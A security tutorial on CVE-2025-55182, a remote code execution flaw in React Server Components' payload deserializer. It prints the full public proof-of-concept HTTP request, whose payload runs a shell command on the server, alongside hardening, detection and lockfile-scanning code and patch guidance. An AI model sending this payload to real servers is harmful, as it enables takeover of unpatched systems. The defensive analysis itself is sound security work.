Dec 23, 2025 | Research & Tutorials

React Server Components (RSC) promise less client-side JavaScript, but that convenience can hide serious risk. On December 3, 2025, the React team published an advisory for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability in the react-server-dom-* packages that implement the server side of RSC.

The vulnerability received the maximum CVSS score of 10.0. That score reflects a bug that is reachable over the network, needs no privileges and no user interaction, and hands the attacker the whole server process, so confidentiality, integrity and availability are all lost at once.

Understanding the Vulnerability

React Server Components talk to the server over a wire protocol called Flight. Server Functions (server actions) are invoked by sending a Flight reply payload in the request body, and the problem lies in how the server deserializes that payload. Vulnerable versions trust the structure of what they receive: instead of checking that each value is the kind of object the protocol expects at that position, the server resolves whatever references and nested objects the client sends.

The root issue is unsafe deserialization. Internally, React represents pieces of a payload as objects called Chunks. A vulnerable server cannot tell a genuine Chunk from a client-supplied object shaped like one, so an attacker can craft a fake Chunk, have React treat it as real, and steer the parser's internal state until it calls a function of the attacker's choosing with attacker-controlled arguments. That is enough to execute arbitrary JavaScript on the server.

How the Public PoC Works

The public proof of concept involves no memory corruption. It chains ordinary JavaScript semantics (prototype walks, thenables and the Function constructor) against the parser's own reference syntax:

  • The attacker submits a Flight payload whose first form field is a crafted object shaped like a Chunk, plus a second field ("$@0") that makes React create a genuine Chunk to borrow from.
  • The fake Chunk's then property is the reference "$1:__proto__:then", which resolves to the real Chunk.prototype.then, and its status is set to "resolved_model".
  • When React resolves the fake Chunk as a promise, the borrowed then runs with the fake object as this and initializes it as a model, parsing the attacker's value string through the attacker-supplied _response object instead of the real one.
  • In that _response, _formData.get is the reference "$1:constructor:constructor", which resolves to the Function constructor, and _prefix holds JavaScript source.
  • The Blob reference "$B1337" inside value makes React call _formData.get(_prefix + "1337"), so the attacker's source is compiled into a function; that function lands in the inner object's then property and is invoked as a thenable, running the attacker's code on the server.
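
To make the reference-resolution problem concrete, here is an added example that is not React's code: a stripped-down model of a "$field:key:key" resolver in the style of a Flight reply parser, with the vulnerable pattern (follow every segment with plain property access) next to a hardened one. The Chunk class, the demoFields input and both resolver functions are assumptions for illustration; React's real parser and the exact upstream fix differ.

```javascript
// Added example (not React's code): a simplified model of "$<field>:<key>:<key>"
// reference resolution, showing why walking arbitrary property names through
// client-supplied references reaches code-execution gadgets.
// Chunk, demoFields and both resolvers are assumptions for illustration.

class Chunk {
  constructor(status, value) { this.status = status; this.value = value; }
  then(resolve) { resolve(this.value); } // stands in for the real Chunk.prototype.then
}

// Constructed stand-in for a decoded request: field "1" is a genuine Chunk,
// like the one "$@0" produces in the PoC; field "2" is ordinary user data.
const demoFields = {
  '1': new Chunk('resolved_model', '"hi"'),
  '2': { user: { name: 'alice' } },
};

// Vulnerable pattern: split on ':' and follow each segment with value[key].
// Nothing stops __proto__ or constructor, so a reference escapes the data the
// client legitimately sent and lands on built-ins such as Function.
function resolveReferenceUnsafe(fields, ref) {
  const [id, ...path] = ref.slice(1).split(':');
  let value = fields[id];
  for (const key of path) value = value[key];
  return value;
}

// Hardened pattern: a strict grammar, only own properties of plain objects,
// and the keys that climb to prototypes or constructors refused outright.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function resolveReferenceSafe(fields, ref) {
  if (!/^\$\d+(:[A-Za-z0-9_]+)*$/.test(ref)) throw new Error('malformed reference: ' + ref);
  const [id, ...path] = ref.slice(1).split(':');
  if (!Object.prototype.hasOwnProperty.call(fields, id)) throw new Error('unknown field: ' + id);
  let value = fields[id];
  for (const key of path) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error('forbidden key in reference: ' + key);
    if (value === null || typeof value !== 'object' || Array.isArray(value)
        || !Object.prototype.hasOwnProperty.call(value, key)) {
      throw new Error('reference does not name an own property: ' + ref);
    }
    value = value[key];
  }
  return value;
}

// What the two references from the PoC resolve to under the unsafe resolver.
function gadgetDemo() {
  const borrowedThen = resolveReferenceUnsafe(demoFields, '$1:__proto__:then');
  const fnCtor = resolveReferenceUnsafe(demoFields, '$1:constructor:constructor');
  // fnCtor is the global Function constructor: any string becomes executable code.
  const compiled = fnCtor('return 6 * 7');
  return {
    borrowedThenIsChunkThen: borrowedThen === Chunk.prototype.then,
    fnCtorIsFunction: fnCtor === Function,
    compiledResult: compiled(), // 42
  };
}
```

The hardened resolver still serves legitimate references such as "$2:user:name", but every step must be an own property of a plain object, which is the check the vulnerable pattern lacks.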

The Exploit Payload

The attacker only needs to send a single HTTP POST to an RSC endpoint. The Next-Action header, whose value does not have to match any real action ID, tells Next.js to hand the body to the RSC deserializer, and the deserializer runs before any action is looked up. No account, session or CSRF token is required. Below is the public PoC request, which creates a file in the /tmp directory to verify execution:

POST / HTTP/1.1
Host: 192.168.120.206
User-Agent: Mozilla/5.0 ... Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 467

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('touch /tmp/rce_poc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
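
For triage of access logs or a WAF rule, the following added example (not React's or any vendor's code) parses a multipart server-action body like the one above and flags the markers of the public PoC: attacker-supplied internal fields (_response, _formData, _prefix, __proto__) and references that walk into __proto__, constructor or prototype. The request bodies are constructed from the PoC above and from a benign action call; the function names are assumptions.

```javascript
// Added example (not React's code): inspect a Next-Action multipart body for the
// shape of the CVE-2025-55182 public PoC. Heuristic only: it recognises the
// published payload's markers, not every encoding an attacker could choose.

// Constructed request body reproducing the PoC above, CRLF-delimited as on the wire.
const BOUNDARY = '----WebKitFormBoundaryx8jO2oVc6SWP3Sad';
const POC_BODY = [
  '--' + BOUNDARY,
  'Content-Disposition: form-data; name="0"',
  '',
  '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' +
    '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":' +
    '"process.mainModule.require(\'child_process\').execSync(\'touch /tmp/rce_poc\');",' +
    '"_formData":{"get":"$1:constructor:constructor"}}}',
  '--' + BOUNDARY,
  'Content-Disposition: form-data; name="1"',
  '',
  '"$@0"',
  '--' + BOUNDARY + '--',
  '',
].join('\r\n');

// Constructed benign body: a normal action call with one JSON argument array.
const BENIGN_BODY = [
  '--' + BOUNDARY,
  'Content-Disposition: form-data; name="0"',
  '',
  '[{"userId":42,"note":"hello"}]',
  '--' + BOUNDARY + '--',
  '',
].join('\r\n');

function boundaryFromContentType(contentType) {
  const m = /boundary=([^;\s]+)/.exec(contentType);
  if (!m) throw new Error('not a multipart/form-data content type');
  return m[1];
}

// Minimal multipart/form-data parser: returns { fieldName: rawValue }.
function parseMultipart(body, boundary) {
  const fields = {};
  for (const raw of body.split('--' + boundary)) {
    const part = raw.replace(/^\r\n/, '');
    if (part === '' || part.startsWith('--')) continue; // preamble or closing "--"
    const sep = part.indexOf('\r\n\r\n');
    if (sep < 0) continue;
    const headers = part.slice(0, sep);
    let value = part.slice(sep + 4);
    if (value.endsWith('\r\n')) value = value.slice(0, -2);
    const name = /name="([^"]*)"/.exec(headers);
    if (name) fields[name[1]] = value;
  }
  return fields;
}

// Keys a client has no business sending: they name the parser's own internals.
const SUSPICIOUS_KEYS = new Set(['_response', '_formData', '_prefix', '__proto__']);
// A "$N:a:b" reference whose path climbs into a prototype or constructor.
const PROTO_WALK = /^\$\d+(:[^:]*)*:(__proto__|constructor|prototype)(:|$)/;

function walk(node, where, findings) {
  if (typeof node === 'string') {
    if (PROTO_WALK.test(node)) findings.push(where + ': reference walks into built-ins: ' + node);
    // The PoC nests a second JSON document inside "value"; look into it too.
    if (node[0] === '{' || node[0] === '[') {
      try { walk(JSON.parse(node), where + ' (nested JSON)', findings); } catch (e) { /* not JSON */ }
    }
    return;
  }
  if (Array.isArray(node)) { node.forEach((v, i) => walk(v, where + '[' + i + ']', findings)); return; }
  if (node && typeof node === 'object') {
    for (const [k, v] of Object.entries(node)) {
      if (SUSPICIOUS_KEYS.has(k)) findings.push(where + ': client-supplied internal field "' + k + '"');
      walk(v, where + '.' + k, findings);
    }
  }
}

// Returns a list of human-readable findings; an empty list means nothing matched.
function inspectRequest(contentType, body) {
  const fields = parseMultipart(body, boundaryFromContentType(contentType));
  const findings = [];
  for (const [name, raw] of Object.entries(fields)) {
    let parsed;
    try { parsed = JSON.parse(raw); } catch (e) { continue; } // file parts etc. are skipped
    walk(parsed, 'field ' + name, findings);
  }
  return findings;
}
```

Against the PoC body this reports five findings (the then reference, the _response, _prefix and _formData keys, and the constructor walk in get); the benign body reports none. A rule like this buys time for log review, not protection: the markers it keys on are properties of one published payload, and the only fix is the patched package.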

Impact & Remediation

This vulnerability affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0, and therefore every framework build that bundles one of them, Next.js App Router apps included. It also affects apps that never define a Server Function of their own, because the deserializer runs before any action is looked up.

What you must do immediately:

  • Upgrade: move to the patched releases 19.0.1, 19.1.2 or 19.2.1 of the react-server-dom-* packages, or to the framework release that bundles them, and redeploy.
  • Check dependencies: even if you never installed react-server-dom-* directly, your framework almost certainly did. Inspect the lockfile for transitive and nested copies rather than trusting package.json.
  • WAF: enable your provider's rule for this CVE if you cannot patch immediately, and treat it as a stopgap. Such rules match the shape of the public PoC and can be bypassed by re-encoding the payload.
  • Incident response: treat any server that ran a vulnerable version while reachable as potentially compromised. Review access logs for POST requests carrying a Next-Action header with unusual multipart bodies, and look for child processes spawned by the Node.js server process.
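
The dependency check above is where most teams go wrong, because the vulnerable package is usually a transitive dependency nested under the framework. The following added example (not React's or npm's code) scans a lockfileVersion 2 or 3 package-lock.json for every installed copy of the three react-server-dom-* packages and marks the versions the advisory lists. The sample lockfile and the app-framework package name are constructed for illustration; the version sets are taken from the advisory.

```javascript
// Added example (not React's or npm's code): find every react-server-dom-*
// copy in a package-lock.json (lockfileVersion 2/3) and flag vulnerable releases.
// SAMPLE_LOCK and "app-framework" are constructed for illustration.

const RSC_PACKAGES = new Set([
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
]);
// Versions named in the advisory. Exact match on purpose: canary or experimental
// builds are not assessed by this script and need a manual look.
const VULNERABLE_VERSIONS = new Set(['19.0.0', '19.1.0', '19.1.1', '19.2.0']);

// npm keys lockfile entries by install path, e.g.
// "node_modules/next/node_modules/react-server-dom-webpack"; the package name
// is whatever follows the last "node_modules/".
function packageNameFromPath(installPath) {
  const marker = 'node_modules/';
  const i = installPath.lastIndexOf(marker);
  return i < 0 ? installPath : installPath.slice(i + marker.length);
}

// Returns one record per installed RSC package copy, nested copies included.
function findRscPackages(lock) {
  if (!lock.packages) throw new Error('expected lockfileVersion 2 or 3 (a "packages" map)');
  const findings = [];
  for (const [installPath, meta] of Object.entries(lock.packages)) {
    if (installPath === '') continue; // the root project entry
    const name = meta.name || packageNameFromPath(installPath); // meta.name is set for aliases
    if (!RSC_PACKAGES.has(name)) continue;
    findings.push({
      name,
      version: meta.version,
      path: installPath,
      vulnerable: VULNERABLE_VERSIONS.has(meta.version),
    });
  }
  return findings;
}

function findVulnerableRsc(lock) {
  return findRscPackages(lock).filter((f) => f.vulnerable);
}

// Constructed lockfile: a hypothetical framework bundles its own nested copy of
// react-server-dom-webpack 19.2.0 while the top level has a patched parcel build.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'app-framework': '^1.0.0' } },
    'node_modules/app-framework': { version: '1.0.0' },
    'node_modules/app-framework/node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/react-server-dom-parcel': { version: '19.2.1' },
    'node_modules/react': { version: '19.2.0' }, // react itself is not one of the affected packages
  },
};

// Usage: findVulnerableRsc(JSON.parse(fs.readFileSync('package-lock.json', 'utf8')))
// On SAMPLE_LOCK this returns the single nested 19.2.0 copy.
```

On a live tree, `npm ls react-server-dom-webpack react-server-dom-parcel react-server-dom-turbopack` prints the same nesting from node_modules; the lockfile scan is what you run in CI before anything is installed.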